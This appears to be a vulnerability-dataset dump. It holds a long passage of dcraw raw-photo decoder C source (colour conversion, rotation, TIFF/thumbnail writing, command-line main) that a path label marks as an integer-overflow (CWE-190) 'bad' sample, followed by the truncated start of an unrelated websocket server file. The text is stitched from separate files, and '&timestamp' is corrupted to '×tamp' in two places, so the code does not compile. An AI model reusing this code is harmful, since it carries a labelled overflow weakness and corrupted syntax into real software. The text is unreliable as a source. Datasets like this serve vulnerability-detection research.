{ 1024, 0, 0x2100000, 0x6d6e7472, 0x52474220, 0x58595a20, 0, 0, 0,
0x61637370, 0, 0, 0x6e6f6e65, 0, 0, 0, 0, 0xf6d6, 0x10000, 0xd32d };
unsigned pbody[] =
{ 10, 0x63707274, 0, 36, /* cprt */
0x64657363, 0, 40, /* desc */
0x77747074, 0, 20, /* wtpt */
0x626b7074, 0, 20, /* bkpt */
0x72545243, 0, 14, /* rTRC */
0x67545243, 0, 14, /* gTRC */
0x62545243, 0, 14, /* bTRC */
0x7258595a, 0, 20, /* rXYZ */
0x6758595a, 0, 20, /* gXYZ */
0x6258595a, 0, 20 }; /* bXYZ */
static const unsigned pwhite[] = { 0xf351, 0x10000, 0x116cc };
unsigned pcurve[] = { 0x63757276, 0, 1, 0x1000000 };
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_CONVERT_RGB,0,2);
#endif
gamma_curve (gamm[0], gamm[1], 0, 0);
memcpy (out_cam, rgb_cam, sizeof out_cam);
#ifndef LIBRAW_LIBRARY_BUILD
raw_color |= colors == 1 || document_mode ||
output_color < 1 || output_color > 6;
#else
raw_color |= colors == 1 ||
output_color < 1 || output_color > 6;
#endif
if (!raw_color) {
oprof = (unsigned *) calloc (phead[0], 1);
merror (oprof, "convert_to_rgb()");
memcpy (oprof, phead, sizeof phead);
if (output_color == 5) oprof[4] = oprof[5];
oprof[0] = 132 + 12*pbody[0];
for (i=0; i < pbody[0]; i++) {
oprof[oprof[0]/4] = i ? (i > 1 ? 0x58595a20 : 0x64657363) : 0x74657874;
pbody[i*3+2] = oprof[0];
oprof[0] += (pbody[i*3+3] + 3) & -4;
}
memcpy (oprof+32, pbody, sizeof pbody);
oprof[pbody[5]/4+2] = strlen(name[output_color-1]) + 1;
memcpy ((char *)oprof+pbody[8]+8, pwhite, sizeof pwhite);
pcurve[3] = (short)(256/gamm[5]+0.5) << 16;
for (i=4; i < 7; i++)
memcpy ((char *)oprof+pbody[i*3+2], pcurve, sizeof pcurve);
pseudoinverse ((double (*)[3]) out_rgb[output_color-1], inverse, 3);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++) {
for (num = k=0; k < 3; k++)
num += xyzd50_srgb[i][k] * inverse[j][k];
oprof[pbody[j*3+23]/4+i+2] = num * 0x10000 + 0.5;
}
for (i=0; i < phead[0]/4; i++)
oprof[i] = htonl(oprof[i]);
strcpy ((char *)oprof+pbody[2]+8, "auto-generated by dcraw");
strcpy ((char *)oprof+pbody[5]+12, name[output_color-1]);
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
for (out_cam[i][j] = k=0; k < 3; k++)
out_cam[i][j] += out_rgb[output_color-1][i][k] * rgb_cam[k][j];
}
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr, raw_color ? _("Building histograms...\n") :
_("Converting to %s colorspace...\n"), name[output_color-1]);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
convert_to_rgb_loop(out_cam);
#else
memset (histogram, 0, sizeof histogram);
for (img=image[0], row=0; row < height; row++)
for (col=0; col < width; col++, img+=4) {
if (!raw_color) {
out[0] = out[1] = out[2] = 0;
FORCC {
out[0] += out_cam[0][c] * img[c];
out[1] += out_cam[1][c] * img[c];
out[2] += out_cam[2][c] * img[c];
}
FORC3 img[c] = CLIP((int) out[c]);
}
else if (document_mode)
img[0] = img[fcol(row,col)];
FORCC histogram[c][img[c] >> 3]++;
}
#endif
if (colors == 4 && output_color) colors = 3;
#ifndef LIBRAW_LIBRARY_BUILD
if (document_mode && filters) colors = 1;
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_CONVERT_RGB,1,2);
#endif
}
void CLASS fuji_rotate()
{
int i, row, col;
double step;
float r, c, fr, fc;
unsigned ur, uc;
ushort wide, high, (*img)[4], (*pix)[4];
if (!fuji_width) return;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Rotating image 45 degrees...\n"));
#endif
fuji_width = (fuji_width - 1 + shrink) >> shrink;
step = sqrt(0.5);
wide = fuji_width / step;
high = (height - fuji_width) / step;
img = (ushort (*)[4]) calloc (high, wide*sizeof *img);
merror (img, "fuji_rotate()");
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_FUJI_ROTATE,0,2);
#endif
for (row=0; row < high; row++)
for (col=0; col < wide; col++) {
ur = r = fuji_width + (row-col)*step;
uc = c = (row+col)*step;
if (ur > height-2 || uc > width-2) continue;
fr = r - ur;
fc = c - uc;
pix = image + ur*width + uc;
for (i=0; i < colors; i++)
img[row*wide+col][i] =
(pix[ 0][i]*(1-fc) + pix[ 1][i]*fc) * (1-fr) +
(pix[width][i]*(1-fc) + pix[width+1][i]*fc) * fr;
}
free (image);
width = wide;
height = high;
image = img;
fuji_width = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_FUJI_ROTATE,1,2);
#endif
}
void CLASS stretch()
{
ushort newdim, (*img)[4], *pix0, *pix1;
int row, col, c;
double rc, frac;
if (pixel_aspect == 1) return;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_STRETCH,0,2);
#endif
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Stretching the image...\n"));
#endif
if (pixel_aspect < 1) {
newdim = height / pixel_aspect + 0.5;
img = (ushort (*)[4]) calloc (width, newdim*sizeof *img);
merror (img, "stretch()");
for (rc=row=0; row < newdim; row++, rc+=pixel_aspect) {
frac = rc - (c = rc);
pix0 = pix1 = image[c*width];
if (c+1 < height) pix1 += width*4;
for (col=0; col < width; col++, pix0+=4, pix1+=4)
FORCC img[row*width+col][c] = pix0[c]*(1-frac) + pix1[c]*frac + 0.5;
}
height = newdim;
} else {
newdim = width * pixel_aspect + 0.5;
img = (ushort (*)[4]) calloc (height, newdim*sizeof *img);
merror (img, "stretch()");
for (rc=col=0; col < newdim; col++, rc+=1/pixel_aspect) {
frac = rc - (c = rc);
pix0 = pix1 = image[c];
if (c+1 < width) pix1 += 4;
for (row=0; row < height; row++, pix0+=width*4, pix1+=width*4)
FORCC img[row*newdim+col][c] = pix0[c]*(1-frac) + pix1[c]*frac + 0.5;
}
width = newdim;
}
free (image);
image = img;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_STRETCH,1,2);
#endif
}
int CLASS flip_index (int row, int col)
{
if (flip & 4) SWAP(row,col);
if (flip & 2) row = iheight - 1 - row;
if (flip & 1) col = iwidth - 1 - col;
return row * iwidth + col;
}
//@end COMMON
struct tiff_tag {
ushort tag, type;
int count;
union { char c[4]; short s[2]; int i; } val;
};
struct tiff_hdr {
ushort t_order, magic;
int ifd;
ushort pad, ntag;
struct tiff_tag tag[23];
int nextifd;
ushort pad2, nexif;
struct tiff_tag exif[4];
ushort pad3, ngps;
struct tiff_tag gpst[10];
short bps[4];
int rat[10];
unsigned gps[26];
char t_desc[512], t_make[64], t_model[64], soft[32], date[20], t_artist[64];
};
//@out COMMON
void CLASS tiff_set (struct tiff_hdr *th, ushort *ntag,
ushort tag, ushort type, int count, int val)
{
struct tiff_tag *tt;
int c;
tt = (struct tiff_tag *)(ntag+1) + (*ntag)++;
tt->val.i = val;
if (type == 1 && count <= 4)
FORC(4) tt->val.c[c] = val >> (c << 3);
else if (type == 2) {
count = strnlen((char *)th + val, count-1) + 1;
if (count <= 4)
FORC(4) tt->val.c[c] = ((char *)th)[val+c];
} else if (type == 3 && count <= 2)
FORC(2) tt->val.s[c] = val >> (c << 4);
tt->count = count;
tt->type = type;
tt->tag = tag;
}
#define TOFF(ptr) ((char *)(&(ptr)) - (char *)th)
void CLASS tiff_head (struct tiff_hdr *th, int full)
{
int c, psize=0;
struct tm *t;
memset (th, 0, sizeof *th);
th->t_order = htonl(0x4d4d4949) >> 16;
th->magic = 42;
th->ifd = 10;
th->rat[0] = th->rat[2] = 300;
th->rat[1] = th->rat[3] = 1;
FORC(6) th->rat[4+c] = 1000000;
th->rat[4] *= shutter;
th->rat[6] *= aperture;
th->rat[8] *= focal_len;
strncpy (th->t_desc, desc, 512);
strncpy (th->t_make, make, 64);
strncpy (th->t_model, model, 64);
strcpy (th->soft, "dcraw v" DCRAW_VERSION);
t = localtime (×tamp);
sprintf (th->date, "%04d:%02d:%02d %02d:%02d:%02d",
t->tm_year+1900,t->tm_mon+1,t->tm_mday,t->tm_hour,t->tm_min,t->tm_sec);
strncpy (th->t_artist, artist, 64);
if (full) {
tiff_set (th, &th->ntag, 254, 4, 1, 0);
tiff_set (th, &th->ntag, 256, 4, 1, width);
tiff_set (th, &th->ntag, 257, 4, 1, height);
tiff_set (th, &th->ntag, 258, 3, colors, output_bps);
if (colors > 2)
th->tag[th->ntag-1].val.i = TOFF(th->bps);
FORC4 th->bps[c] = output_bps;
tiff_set (th, &th->ntag, 259, 3, 1, 1);
tiff_set (th, &th->ntag, 262, 3, 1, 1 + (colors > 1));
}
tiff_set (th, &th->ntag, 270, 2, 512, TOFF(th->t_desc));
tiff_set (th, &th->ntag, 271, 2, 64, TOFF(th->t_make));
tiff_set (th, &th->ntag, 272, 2, 64, TOFF(th->t_model));
if (full) {
if (oprof) psize = ntohl(oprof[0]);
tiff_set (th, &th->ntag, 273, 4, 1, sizeof *th + psize);
tiff_set (th, &th->ntag, 277, 3, 1, colors);
tiff_set (th, &th->ntag, 278, 4, 1, height);
tiff_set (th, &th->ntag, 279, 4, 1, height*width*colors*output_bps/8);
} else
tiff_set (th, &th->ntag, 274, 3, 1, "12435867"[flip]-'0');
tiff_set (th, &th->ntag, 282, 5, 1, TOFF(th->rat[0]));
tiff_set (th, &th->ntag, 283, 5, 1, TOFF(th->rat[2]));
tiff_set (th, &th->ntag, 284, 3, 1, 1);
tiff_set (th, &th->ntag, 296, 3, 1, 2);
tiff_set (th, &th->ntag, 305, 2, 32, TOFF(th->soft));
tiff_set (th, &th->ntag, 306, 2, 20, TOFF(th->date));
tiff_set (th, &th->ntag, 315, 2, 64, TOFF(th->t_artist));
tiff_set (th, &th->ntag, 34665, 4, 1, TOFF(th->nexif));
if (psize) tiff_set (th, &th->ntag, 34675, 7, psize, sizeof *th);
tiff_set (th, &th->nexif, 33434, 5, 1, TOFF(th->rat[4]));
tiff_set (th, &th->nexif, 33437, 5, 1, TOFF(th->rat[6]));
tiff_set (th, &th->nexif, 34855, 3, 1, iso_speed);
tiff_set (th, &th->nexif, 37386, 5, 1, TOFF(th->rat[8]));
if (gpsdata[1]) {
tiff_set (th, &th->ntag, 34853, 4, 1, TOFF(th->ngps));
tiff_set (th, &th->ngps, 0, 1, 4, 0x202);
tiff_set (th, &th->ngps, 1, 2, 2, gpsdata[29]);
tiff_set (th, &th->ngps, 2, 5, 3, TOFF(th->gps[0]));
tiff_set (th, &th->ngps, 3, 2, 2, gpsdata[30]);
tiff_set (th, &th->ngps, 4, 5, 3, TOFF(th->gps[6]));
tiff_set (th, &th->ngps, 5, 1, 1, gpsdata[31]);
tiff_set (th, &th->ngps, 6, 5, 1, TOFF(th->gps[18]));
tiff_set (th, &th->ngps, 7, 5, 3, TOFF(th->gps[12]));
tiff_set (th, &th->ngps, 18, 2, 12, TOFF(th->gps[20]));
tiff_set (th, &th->ngps, 29, 2, 12, TOFF(th->gps[23]));
memcpy (th->gps, gpsdata, sizeof th->gps);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS jpeg_thumb_writer (FILE *tfp,char *t_humb,int t_humb_length)
{
ushort exif[5];
struct tiff_hdr th;
fputc (0xff, tfp);
fputc (0xd8, tfp);
if (strcmp (t_humb+6, "Exif")) {
memcpy (exif, "\xff\xe1 Exif\0\0", 10);
exif[1] = htons (8 + sizeof th);
fwrite (exif, 1, sizeof exif, tfp);
tiff_head (&th, 0);
fwrite (&th, 1, sizeof th, tfp);
}
fwrite (t_humb+2, 1, t_humb_length-2, tfp);
}
void CLASS jpeg_thumb()
{
char *thumb;
thumb = (char *) malloc (thumb_length);
merror (thumb, "jpeg_thumb()");
fread (thumb, 1, thumb_length, ifp);
jpeg_thumb_writer(ofp,thumb,thumb_length);
free (thumb);
}
#else
void CLASS jpeg_thumb()
{
char *thumb;
ushort exif[5];
struct tiff_hdr th;
thumb = (char *) malloc (thumb_length);
merror (thumb, "jpeg_thumb()");
fread (thumb, 1, thumb_length, ifp);
fputc (0xff, ofp);
fputc (0xd8, ofp);
if (strcmp (thumb+6, "Exif")) {
memcpy (exif, "\xff\xe1 Exif\0\0", 10);
exif[1] = htons (8 + sizeof th);
fwrite (exif, 1, sizeof exif, ofp);
tiff_head (&th, 0);
fwrite (&th, 1, sizeof th, ofp);
}
fwrite (thumb+2, 1, thumb_length-2, ofp);
free (thumb);
}
#endif
void CLASS write_ppm_tiff()
{
struct tiff_hdr th;
uchar *ppm;
ushort *ppm2;
int c, row, col, soff, rstep, cstep;
int perc, val, total, t_white=0x2000;
#ifdef LIBRAW_LIBRARY_BUILD
perc = width * height * auto_bright_thr;
#else
perc = width * height * 0.01; /* 99th percentile white level */
#endif
if (fuji_width) perc /= 2;
if (!((highlight & ~2) || no_auto_bright))
for (t_white=c=0; c < colors; c++) {
for (val=0x2000, total=0; --val > 32; )
if ((total += histogram[c][val]) > perc) break;
if (t_white < val) t_white = val;
}
gamma_curve (gamm[0], gamm[1], 2, (t_white << 3)/bright);
iheight = height;
iwidth = width;
if (flip & 4) SWAP(height,width);
ppm = (uchar *) calloc (width, colors*output_bps/8);
ppm2 = (ushort *) ppm;
merror (ppm, "write_ppm_tiff()");
if (output_tiff) {
tiff_head (&th, 1);
fwrite (&th, sizeof th, 1, ofp);
if (oprof)
fwrite (oprof, ntohl(oprof[0]), 1, ofp);
} else if (colors > 3)
fprintf (ofp,
"P7\nWIDTH %d\nHEIGHT %d\nDEPTH %d\nMAXVAL %d\nTUPLTYPE %s\nENDHDR\n",
width, height, colors, (1 << output_bps)-1, cdesc);
else
fprintf (ofp, "P%d\n%d %d\n%d\n",
colors/2+5, width, height, (1 << output_bps)-1);
soff = flip_index (0, 0);
cstep = flip_index (0, 1) - soff;
rstep = flip_index (1, 0) - flip_index (0, width);
for (row=0; row < height; row++, soff += rstep) {
for (col=0; col < width; col++, soff += cstep)
if (output_bps == 8)
FORCC ppm [col*colors+c] = curve[image[soff][c]] >> 8;
else FORCC ppm2[col*colors+c] = curve[image[soff][c]];
if (output_bps == 16 && !output_tiff && htons(0x55aa) != 0x55aa)
swab ((char*)ppm2, (char*)ppm2, width*colors*2);
fwrite (ppm, colors*output_bps/8, width, ofp);
}
free (ppm);
}
//@end COMMON
int CLASS main (int argc, const char **argv)
{
int arg, status=0, quality, i, c;
int timestamp_only=0, thumbnail_only=0, identify_only=0;
int user_qual=-1, user_black=-1, user_sat=-1, user_flip=-1;
int use_fuji_rotate=1, write_to_stdout=0, read_from_stdin=0;
const char *sp, *bpfile=0, *dark_frame=0, *write_ext;
char opm, opt, *ofname, *cp;
struct utimbuf ut;
#ifndef NO_LCMS
const char *cam_profile=0, *out_profile=0;
#endif
#ifndef LOCALTIME
putenv ((char *) "TZ=UTC");
#endif
#ifdef LOCALEDIR
setlocale (LC_CTYPE, "");
setlocale (LC_MESSAGES, "");
bindtextdomain ("dcraw", LOCALEDIR);
textdomain ("dcraw");
#endif
if (argc == 1) {
printf(_("\nRaw photo decoder \"dcraw\" v%s"), DCRAW_VERSION);
printf(_("\nby Dave Coffin, dcoffin a cybercom o net\n"));
printf(_("\nUsage: %s [OPTION]... [FILE]...\n\n"), argv[0]);
puts(_("-v Print verbose messages"));
puts(_("-c Write image data to standard output"));
puts(_("-e Extract embedded thumbnail image"));
puts(_("-i Identify files without decoding them"));
puts(_("-i -v Identify files and show metadata"));
puts(_("-z Change file dates to camera timestamp"));
puts(_("-w Use camera white balance, if possible"));
puts(_("-a Average the whole image for white balance"));
puts(_("-A <x y w h> Average a grey box for white balance"));
puts(_("-r <r g b g> Set custom white balance"));
puts(_("+M/-M Use/don't use an embedded color matrix"));
puts(_("-C <r b> Correct chromatic aberration"));
puts(_("-P <file> Fix the dead pixels listed in this file"));
puts(_("-K <file> Subtract dark frame (16-bit raw PGM)"));
puts(_("-k <num> Set the darkness level"));
puts(_("-S <num> Set the saturation level"));
puts(_("-n <num> Set threshold for wavelet denoising"));
puts(_("-H [0-9] Highlight mode (0=clip, 1=unclip, 2=blend, 3+=rebuild)"));
puts(_("-t [0-7] Flip image (0=none, 3=180, 5=90CCW, 6=90CW)"));
puts(_("-o [0-5] Output colorspace (raw,sRGB,Adobe,Wide,ProPhoto,XYZ)"));
#ifndef NO_LCMS
puts(_("-o <file> Apply output ICC profile from file"));
puts(_("-p <file> Apply camera ICC profile from file or \"embed\""));
#endif
puts(_("-d Document mode (no color, no interpolation)"));
puts(_("-D Document mode without scaling (totally raw)"));
puts(_("-j Don't stretch or rotate raw pixels"));
puts(_("-W Don't automatically brighten the image"));
puts(_("-b <num> Adjust brightness (default = 1.0)"));
puts(_("-g <p ts> Set custom gamma curve (default = 2.222 4.5)"));
puts(_("-q [0-3] Set the interpolation quality"));
puts(_("-h Half-size color image (twice as fast as \"-q 0\")"));
puts(_("-f Interpolate RGGB as four colors"));
puts(_("-m <num> Apply a 3x3 median filter to R-G and B-G"));
puts(_("-s [0..N-1] Select one raw image or \"all\" from each file"));
puts(_("-6 Write 16-bit instead of 8-bit"));
puts(_("-4 Linear 16-bit, same as \"-6 -W -g 1 1\""));
puts(_("-T Write TIFF instead of PPM"));
puts("");
return 1;
}
argv[argc] = "";
for (arg=1; (((opm = argv[arg][0]) - 2) | 2) == '+'; ) {
opt = argv[arg++][1];
if ((cp = (char *) strchr (sp="nbrkStqmHACg", opt)))
for (i=0; i < "114111111422"[cp-sp]-'0'; i++)
if (!isdigit(argv[arg+i][0])) {
fprintf (stderr,_("Non-numeric argument to \"-%c\"\n"), opt);
return 1;
}
switch (opt) {
case 'n': threshold = atof(argv[arg++]); break;
case 'b': bright = atof(argv[arg++]); break;
case 'r':
FORC4 user_mul[c] = atof(argv[arg++]); break;
case 'C': aber[0] = 1 / atof(argv[arg++]);
aber[2] = 1 / atof(argv[arg++]); break;
case 'g': gamm[0] = atof(argv[arg++]);
gamm[1] = atof(argv[arg++]);
if (gamm[0]) gamm[0] = 1/gamm[0]; break;
case 'k': user_black = atoi(argv[arg++]); break;
case 'S': user_sat = atoi(argv[arg++]); break;
case 't': user_flip = atoi(argv[arg++]); break;
case 'q': user_qual = atoi(argv[arg++]); break;
case 'm': med_passes = atoi(argv[arg++]); break;
case 'H': highlight = atoi(argv[arg++]); break;
case 's':
shot_select = abs(atoi(argv[arg]));
multi_out = !strcmp(argv[arg++],"all");
break;
case 'o':
if (isdigit(argv[arg][0]) && !argv[arg][1])
output_color = atoi(argv[arg++]);
#ifndef NO_LCMS
else out_profile = argv[arg++];
break;
case 'p': cam_profile = argv[arg++];
#endif
break;
case 'P': bpfile = argv[arg++]; break;
case 'K': dark_frame = argv[arg++]; break;
case 'z': timestamp_only = 1; break;
case 'e': thumbnail_only = 1; break;
case 'i': identify_only = 1; break;
case 'c': write_to_stdout = 1; break;
case 'v': verbose = 1; break;
case 'h': half_size = 1; break;
case 'f': four_color_rgb = 1; break;
case 'A': FORC4 greybox[c] = atoi(argv[arg++]);
case 'a': use_auto_wb = 1; break;
case 'w': use_camera_wb = 1; break;
case 'M': use_camera_matrix = 3 * (opm == '+'); break;
case 'I': read_from_stdin = 1; break;
case 'E': document_mode++;
case 'D': document_mode++;
case 'd': document_mode++;
case 'j': use_fuji_rotate = 0; break;
case 'W': no_auto_bright = 1; break;
case 'T': output_tiff = 1; break;
case '4': gamm[0] = gamm[1] =
no_auto_bright = 1;
case '6': output_bps = 16; break;
default:
fprintf (stderr,_("Unknown option \"-%c\".\n"), opt);
return 1;
}
}
if (arg == argc) {
fprintf (stderr,_("No files to process.\n"));
return 1;
}
if (write_to_stdout) {
if (isatty(1)) {
fprintf (stderr,_("Will not write an image to the terminal!\n"));
return 1;
}
#if defined(WIN32) || defined(DJGPP) || defined(__CYGWIN__)
if (setmode(1,O_BINARY) < 0) {
perror ("setmode()");
return 1;
}
#endif
}
for ( ; arg < argc; arg++) {
status = 1;
raw_image = 0;
image = 0;
oprof = 0;
meta_data = ofname = 0;
ofp = stdout;
if (setjmp (failure)) {
if (fileno(ifp) > 2) fclose(ifp);
if (fileno(ofp) > 2) fclose(ofp);
status = 1;
goto cleanup;
}
ifname = argv[arg];
if (!(ifp = fopen (ifname, "rb"))) {
perror (ifname);
continue;
}
status = (identify(),!is_raw);
if (user_flip >= 0)
flip = user_flip;
switch ((flip+3600) % 360) {
case 270: flip = 5; break;
case 180: flip = 3; break;
case 90: flip = 6;
}
if (timestamp_only) {
if ((status = !timestamp))
fprintf (stderr,_("%s has no timestamp.\n"), ifname);
else if (identify_only)
printf ("%10ld%10d %s\n", (long) timestamp, shot_order, ifname);
else {
if (verbose)
fprintf (stderr,_("%s time set to %d.\n"), ifname, (int) timestamp);
ut.actime = ut.modtime = timestamp;
utime (ifname, &ut);
}
goto next;
}
write_fun = &CLASS write_ppm_tiff;
if (thumbnail_only) {
if ((status = !thumb_offset)) {
fprintf (stderr,_("%s has no thumbnail.\n"), ifname);
goto next;
} else if (thumb_load_raw) {
load_raw = thumb_load_raw;
data_offset = thumb_offset;
height = thumb_height;
width = thumb_width;
filters = 0;
colors = 3;
} else {
fseek (ifp, thumb_offset, SEEK_SET);
write_fun = write_thumb;
goto thumbnail;
}
}
if (load_raw == &CLASS kodak_ycbcr_load_raw) {
height += height & 1;
width += width & 1;
}
if (identify_only && verbose && make[0]) {
printf (_("\nFilename: %s\n"), ifname);
printf (_("Timestamp: %s"), ctime(×tamp));
printf (_("Camera: %s %s\n"), make, model);
if (artist[0])
printf (_("Owner: %s\n"), artist);
if (dng_version) {
printf (_("DNG Version: "));
for (i=24; i >= 0; i -= 8)
printf ("%d%c", dng_version >> i & 255, i ? '.':'\n');
}
printf (_("ISO speed: %d\n"), (int) iso_speed);
printf (_("Shutter: "));
if (shutter > 0 && shutter < 1)
shutter = (printf ("1/"), 1 / shutter);
printf (_("%0.1f sec\n"), shutter);
printf (_("Aperture: f/%0.1f\n"), aperture);
printf (_("Focal length: %0.1f mm\n"), focal_len);
printf (_("Embedded ICC profile: %s\n"), profile_length ? _("yes"):_("no"));
printf (_("Number of raw images: %d\n"), is_raw);
if (pixel_aspect != 1)
printf (_("Pixel Aspect Ratio: %0.6f\n"), pixel_aspect);
if (thumb_offset)
printf (_("Thumb size: %4d x %d\n"), thumb_width, thumb_height);
printf (_("Full size: %4d x %d\n"), raw_width, raw_height);
} else if (!is_raw)
fprintf (stderr,_("Cannot decode file %s\n"), ifname);
if (!is_raw) goto next;
shrink = filters && (half_size || (!identify_only &&
(threshold || aber[0] != 1 || aber[2] != 1)));
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (identify_only) {
if (verbose) {
if (document_mode == 3) {
top_margin = left_margin = fuji_width = 0;
height = raw_height;
width = raw_width;
}
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (use_fuji_rotate) {
if (fuji_width) {
fuji_width = (fuji_width - 1 + shrink) >> shrink;
iwidth = fuji_width / sqrt(0.5);
iheight = (iheight - fuji_width) / sqrt(0.5);
} else {
if (pixel_aspect < 1) iheight = iheight / pixel_aspect + 0.5;
if (pixel_aspect > 1) iwidth = iwidth * pixel_aspect + 0.5;
}
}
if (flip & 4)
SWAP(iheight,iwidth);
printf (_("Image size: %4d x %d\n"), width, height);
printf (_("Output size: %4d x %d\n"), iwidth, iheight);
printf (_("Raw colors: %d"), colors);
if (filters) {
int fhigh = 2, fwide = 2;
if ((filters ^ (filters >> 8)) & 0xff) fhigh = 4;
if ((filters ^ (filters >> 16)) & 0xffff) fhigh = 8;
if (filters == 1) fhigh = fwide = 16;
if (filters == 9) fhigh = fwide = 6;
printf (_("\nFilter pattern: "));
for (i=0; i < fhigh; i++)
for (c = i && putchar('/') && 0; c < fwide; c++)
putchar (cdesc[fcol(i,c)]);
}
printf (_("\nDaylight multipliers:"));
FORCC printf (" %f", pre_mul[c]);
if (cam_mul[0] > 0) {
printf (_("\nCamera multipliers:"));
FORC4 printf (" %f", cam_mul[c]);
}
putchar ('\n');
} else
printf (_("%s is a %s %s image.\n"), ifname, make, model);
next:
fclose(ifp);
continue;
}
if (meta_length) {
meta_data = (char *) malloc (meta_length);
merror (meta_data, "main()");
}
if (filters || colors == 1) {
raw_image = (ushort *) calloc ((raw_height+7), raw_width*2);
merror (raw_image, "main()");
} else {
image = (ushort (*)[4]) calloc (iheight, iwidth*sizeof *image);
merror (image, "main()");
}
if (verbose)
fprintf (stderr,_("Loading %s %s image from %s ...\n"),
make, model, ifname);
if (shot_select >= is_raw)
fprintf (stderr,_("%s: \"-s %d\" requests a nonexistent image!\n"),
ifname, shot_select);
fseeko (ifp, data_offset, SEEK_SET);
if (raw_image && read_from_stdin)
fread (raw_image, 2, raw_height*raw_width, stdin);
else (*load_raw)();
if (document_mode == 3) {
top_margin = left_margin = fuji_width = 0;
height = raw_height;
width = raw_width;
}
iheight = (height + shrink) >> shrink;
iwidth = (width + shrink) >> shrink;
if (raw_image) {
image = (ushort (*)[4]) calloc (iheight, iwidth*sizeof *image);
merror (image, "main()");
crop_masked_pixels();
free (raw_image);
}
if (zero_is_bad) remove_zeroes();
bad_pixels (bpfile);
if (dark_frame) subtract (dark_frame);
quality = 2 + !fuji_width;
if (user_qual >= 0) quality = user_qual;
i = cblack[3];
FORC3 if (i > cblack[c]) i = cblack[c];
FORC4 cblack[c] -= i;
black += i;
i = cblack[6];
FORC (cblack[4] * cblack[5])
if (i > cblack[6+c]) i = cblack[6+c];
FORC (cblack[4] * cblack[5])
cblack[6+c] -= i;
black += i;
if (user_black >= 0) black = user_black;
FORC4 cblack[c] += black;
if (user_sat > 0) maximum = user_sat;
#ifdef COLORCHECK
colorcheck();
#endif
if (is_foveon) {
if (document_mode || load_raw == &CLASS foveon_dp_load_raw) {
for (i=0; i < height*width*4; i++)
if ((short) image[0][i] < 0) image[0][i] = 0;
} else foveon_interpolate();
} else if (document_mode < 2)
scale_colors();
pre_interpolate();
if (filters && !document_mode) {
if (quality == 0)
lin_interpolate();
else if (quality == 1 || colors > 3)
vng_interpolate();
else if (quality == 2 && filters > 1000)
ppg_interpolate();
else if (filters == 9)
xtrans_interpolate (quality*2-3);
else
ahd_interpolate();
}
if (mix_green)
for (colors=3, i=0; i < height*width; i++)
image[i][1] = (image[i][1] + image[i][3]) >> 1;
if (!is_foveon && colors == 3) median_filter();
if (!is_foveon && highlight == 2) blend_highlights();
if (!is_foveon && highlight > 2) recover_highlights();
if (use_fuji_rotate) fuji_rotate();
#ifndef NO_LCMS
if (cam_profile) apply_profile (cam_profile, out_profile);
#endif
convert_to_rgb();
if (use_fuji_rotate) stretch();
thumbnail:
if (write_fun == &CLASS jpeg_thumb)
write_ext = ".jpg";
else if (output_tiff && write_fun == &CLASS write_ppm_tiff)
write_ext = ".tiff";
else
write_ext = ".pgm\0.ppm\0.ppm\0.pam" + colors*5-5;
ofname = (char *) malloc (strlen(ifname) + 64);
merror (ofname, "main()");
if (write_to_stdout)
strcpy (ofname,_("standard output"));
else {
strcpy (ofname, ifname);
if ((cp = strrchr (ofname, '.'))) *cp = 0;
if (multi_out)
sprintf (ofname+strlen(ofname), "_%0*d",
snprintf(0,0,"%d",is_raw-1), shot_select);
if (thumbnail_only)
strcat (ofname, ".thumb");
strcat (ofname, write_ext);
ofp = fopen (ofname, "wb");
if (!ofp) {
status = 1;
perror (ofname);
goto cleanup;
}
}
if (verbose)
fprintf (stderr,_("Writing data to %s ...\n"), ofname);
(*write_fun)();
fclose(ifp);
if (ofp != stdout) fclose(ofp);
cleanup:
if (meta_data) free (meta_data);
if (ofname) free (ofname);
if (oprof) free (oprof);
if (image) free (image);
if (multi_out) {
if (++shot_select < is_raw) arg--;
else shot_select = 0;
}
}
return status;
}
#endif
| ./CrossVul/dataset_final_sorted/CWE-190/c/bad_582_0 |
crossvul-cpp_data_good_402_3 | /*
* Description:
* History: yang@haipo.me, 2017/04/26, create
*/
# include <stdbool.h>
# include <openssl/sha.h>
# include "ut_log.h"
# include "ut_misc.h"
# include "ut_base64.h"
# include "ut_ws_svr.h"
struct ws_frame {
uint8_t fin;
uint8_t opcode;
uint64_t payload_len;
void *payload;
};
struct clt_info {
nw_ses *ses;
void *privdata;
double last_activity;
struct http_parser parser;
sds field;
bool field_set;
sds value;
bool value_set;
bool upgrade;
sds remote;
sds url;
sds message;
http_request_t *request;
struct ws_frame frame;
};
static int on_http_message_begin(http_parser* parser)
{
struct clt_info *info = parser->data;
if (info->request)
http_request_release(info->request);
info->request = http_request_new();
if (info->request == NULL) {
return -__LINE__;
}
return 0;
}
static int send_hand_shake_reply(nw_ses *ses, char *protocol, const char *key)
{
unsigned char hash[20];
sds data = sdsnew(key);
data = sdscat(data, "258EAFA5-E914-47DA-95CA-C5AB0DC85B11");
SHA1((const unsigned char *)data, sdslen(data), hash);
sdsfree(data);
sds b4message;
base64_encode(hash, sizeof(hash), &b4message);
http_response_t *response = http_response_new();
http_response_set_header(response, "Upgrade", "websocket");
http_response_set_header(response, "Connection", "Upgrade");
http_response_set_header(response, "Sec-WebSocket-Accept", b4message);
if (protocol) {
http_response_set_header(response, "Sec-WebSocket-Protocol", protocol);
}
response->status = 101;
sds message = http_response_encode(response);
nw_ses_send(ses, message, sdslen(message));
sdsfree(message);
sdsfree(b4message);
return 0;
}
static bool is_good_protocol(const char *protocol_list, const char *protocol)
